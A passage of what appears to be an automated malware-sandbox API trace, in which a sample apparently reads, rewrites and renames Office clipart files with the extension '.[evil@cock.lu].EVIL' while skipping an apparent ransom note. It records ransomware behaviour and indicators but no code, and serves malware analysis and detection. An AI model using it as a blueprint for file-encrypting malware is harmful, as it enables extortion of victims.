lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe2e9, lpOverlapped=0x0) returned 1 [0152.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.311] _errno () returned 0x84b1160840 [0152.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xe300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe300, lpOverlapped=0x0) returned 1 [0152.311] CloseHandle (hObject=0x1a8) returned 1 [0152.311] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.312] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.312] __uncaught_exception () returned 0x84b1160800 [0152.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg.[evil@cock.lu].evil")) returned 1 [0152.313] ??_V@YAXPEAX@Z () returned 0x1 [0152.316] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG", dwFileAttributes=0x200) returned 0 [0152.316] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.316] wcsstr (_Str="J0228823.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.316] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 69 [0152.316] wcscmp (_String1="J0228823.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.316] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0228823.WMF") returned 0x0 [0152.316] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 0x45 [0152.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.318] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x65a6, lpOverlapped=0x0) returned 1 [0152.325] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.325] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.325] _errno () returned 0x84b1160840 [0152.325] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.325] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x65c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x65c0, lpOverlapped=0x0) returned 1 [0152.325] CloseHandle (hObject=0x1a8) returned 1 [0152.325] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.325] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.325] __uncaught_exception () returned 0x84b1160800 [0152.325] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.326] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf.[evil@cock.lu].evil")) returned 1 [0152.326] ??_V@YAXPEAX@Z () returned 0x1 [0152.329] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF", dwFileAttributes=0x200) returned 0 [0152.329] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.329] wcsstr (_Str="J0228959.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.329] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 69 [0152.329] wcscmp (_String1="J0228959.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.329] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0228959.WMF") returned 0x0 [0152.329] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 0x45 [0152.329] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.331] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x918c, lpOverlapped=0x0) returned 1 [0152.338] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.338] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.338] _errno () returned 0x84b1160840 [0152.338] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.338] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x91a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x91a0, lpOverlapped=0x0) returned 1 [0152.338] CloseHandle (hObject=0x1a8) returned 1 [0152.338] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.339] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.339] __uncaught_exception () returned 0x84b1160800 [0152.339] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.339] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf.[evil@cock.lu].evil")) returned 1 [0152.340] ??_V@YAXPEAX@Z () returned 0x1 [0152.342] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF", dwFileAttributes=0x200) returned 0 [0152.343] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.343] wcsstr (_Str="J0230553.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.343] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 69 [0152.343] wcscmp (_String1="J0230553.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.343] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0230553.WMF") returned 0x0 [0152.343] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 0x45 [0152.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.345] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1daa, lpOverlapped=0x0) returned 1 [0152.372] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.372] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.372] _errno () returned 0x84b1160840 [0152.372] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.372] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1dc0, lpOverlapped=0x0) returned 1 [0152.372] CloseHandle (hObject=0x1a8) returned 1 [0152.372] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.372] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.372] __uncaught_exception () returned 0x84b1160800 [0152.372] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.373] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf.[evil@cock.lu].evil")) returned 1 [0152.373] ??_V@YAXPEAX@Z () returned 0x1 [0152.376] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF", dwFileAttributes=0x200) returned 0 [0152.376] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.376] wcsstr (_Str="J0230558.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.376] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 69 [0152.376] wcscmp (_String1="J0230558.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.376] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0230558.WMF") returned 0x0 [0152.376] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 0x45 [0152.376] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.379] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1066, lpOverlapped=0x0) returned 1 [0152.387] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.387] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.387] _errno () returned 0x84b1160840 [0152.387] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.387] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1080, lpOverlapped=0x0) returned 1 [0152.387] CloseHandle (hObject=0x1a8) returned 1 [0152.387] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.388] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.388] __uncaught_exception () returned 0x84b1160800 [0152.388] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.388] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf.[evil@cock.lu].evil")) returned 1 [0152.389] ??_V@YAXPEAX@Z () returned 0x1 [0152.392] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF", dwFileAttributes=0x200) returned 0 [0152.392] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.392] wcsstr (_Str="J0232171.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.392] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF") returned 69 [0152.392] wcscmp (_String1="J0232171.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.392] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0232171.WMF") returned 0x0 [0152.392] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF") returned 0x45 [0152.392] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.394] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x332a, lpOverlapped=0x0) returned 1 [0152.402] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.402] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.402] _errno () returned 0x84b1160840 [0152.402] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.402] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x3340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3340, lpOverlapped=0x0) returned 1 [0152.403] CloseHandle (hObject=0x1a8) returned 1 [0152.403] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.403] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.403] __uncaught_exception () returned 0x84b1160800 [0152.403] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.403] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf.[evil@cock.lu].evil")) returned 1 [0152.404] ??_V@YAXPEAX@Z () returned 0x1 [0152.407] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF", dwFileAttributes=0x200) returned 0 [0152.407] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.407] wcsstr (_Str="J0232393.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.407] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF") returned 69 [0152.407] wcscmp (_String1="J0232393.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.407] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0232393.WMF") returned 0x0 [0152.407] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF") returned 0x45 [0152.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.410] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6bc2, lpOverlapped=0x0) returned 1 [0152.419] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.419] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.419] _errno () returned 0x84b1160840 [0152.419] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.419] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x6be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6be0, lpOverlapped=0x0) returned 1 [0152.419] CloseHandle (hObject=0x1a8) returned 1 [0152.419] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.419] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.419] __uncaught_exception () returned 0x84b1160800 [0152.419] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.419] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf.[evil@cock.lu].evil")) returned 1 [0152.420] ??_V@YAXPEAX@Z () returned 0x1 [0152.423] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF", dwFileAttributes=0x200) returned 0 [0152.423] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.423] wcsstr (_Str="J0232395.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.423] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 69 [0152.423] wcscmp (_String1="J0232395.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.423] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0232395.WMF") returned 0x0 [0152.423] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 0x45 [0152.423] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.425] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa086, lpOverlapped=0x0) returned 1 [0152.433] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.434] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.434] _errno () returned 0x84b1160840 [0152.434] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.434] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xa0a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa0a0, lpOverlapped=0x0) returned 1 [0152.434] CloseHandle (hObject=0x1a8) returned 1 [0152.434] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.434] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.434] __uncaught_exception () returned 0x84b1160800 [0152.434] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.435] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf.[evil@cock.lu].evil")) returned 1 [0152.436] ??_V@YAXPEAX@Z () returned 0x1 [0152.439] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF", dwFileAttributes=0x200) returned 0 [0152.439] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.439] wcsstr (_Str="J0232795.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.439] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 69 [0152.439] wcscmp (_String1="J0232795.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.439] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0232795.WMF") returned 0x0 [0152.439] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 0x45 [0152.439] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.442] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x380a, lpOverlapped=0x0) returned 1 [0152.450] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.450] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.450] _errno () returned 0x84b1160840 [0152.450] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.450] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3820, 